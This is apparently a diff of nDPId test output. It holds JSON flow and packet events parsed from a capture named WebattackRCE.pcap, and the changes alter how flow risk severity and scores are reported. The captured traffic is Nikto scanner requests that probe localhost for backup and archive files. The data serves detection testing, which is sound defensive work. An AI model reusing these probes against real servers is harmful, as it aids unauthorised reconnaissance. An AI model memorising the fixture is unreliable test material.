{"hostname":"127.0.0.1","url":"127.0.0.1\/0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277034,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1576420277034,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277034,"pkt":"AAAAAAAAAAAAAAAACABFAADCi6hAAEAGsIt\/AAABfwAAAcNeH5CrCbPNtCCkdYAYAED+tgAAAQEICp1m\/FKdZvxSR0VUIC9iYWNrdXAuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277034,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277034,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277036,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1576420277036,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277036,"pkt":"AAAAAAAAAAAAAAAACABFAADCaYNAAEAG0rB\/AAABfwAAAcNgH5BETFHrIT\/7L4AYAED+tgAAAQEICp1m\/FSdZvxUR0VUIC9iYWNrdXAuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277036,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277036,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277037,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1576420277037,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277037,"pkt":"AAAAAAAAAAAAAAAACABFAADByHVAAEAGc79\/AAABfwAAAcNiH5AsIfAZ9PZ+lIAYAED+tQAAAQEICp1m\/FWdZvxVR0VUIC8xMjcwMC5jZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277037,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277037,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277040,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1576420277040,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277040,"pkt":"AAAAAAAAAAAAAAAACABFAADBLYNAAEAGDrJ\/AAABfwAAAcNkH5B8OhXu0\/0OtIAYAED+tQAAAQEICp1m\/FidZvxXR0VUIC8xMjcwMC5jZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277040,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277040,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420277041,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1576420277041,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"ts_msec":1576420277041,"pkt":"AAAAAAAAAAAAAAAACABFAADJ0PZAAEAGazZ\/AAABfwAAAcNmH5D3m+iZ0R8Y8oAYAED+vQAAAQEICp1m\/FmdZvxZR0VUIC8xMjdfMF8wXzEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420277041,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420277041,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420277042,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1576420277042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"ts_msec":1576420277042,"pkt":"AAAAAAAAAAAAAAAACABFAADJPvJAAEAG\/Tp\/AAABfwAAAcNoH5CMHAadHXRwyoAYAED+vQAAAQEICp1m\/FqdZvxaR0VUIC8xMjdfMF8wXzEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420277042,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420277042,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277044,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1576420277044,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277044,"pkt":"AAAAAAAAAAAAAAAACABFAADCjwZAAEAGrS1\/AAABfwAAAcNqH5Br7rdq4TxVq4AYAED+tgAAAQEICp1m\/FydZvxcR0VUIC8xMjcwMDEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277044,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277044,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277045,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1576420277045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277045,"pkt":"AAAAAAAAAAAAAAAACABFAADCv9RAAEAGfF9\/AAABfwAAAcNsH5AFEofAoVDNroAYAED+tgAAAQEICp1m\/F2dZvxdR0VUIC8xMjcwMDEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277045,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277045,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277046,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
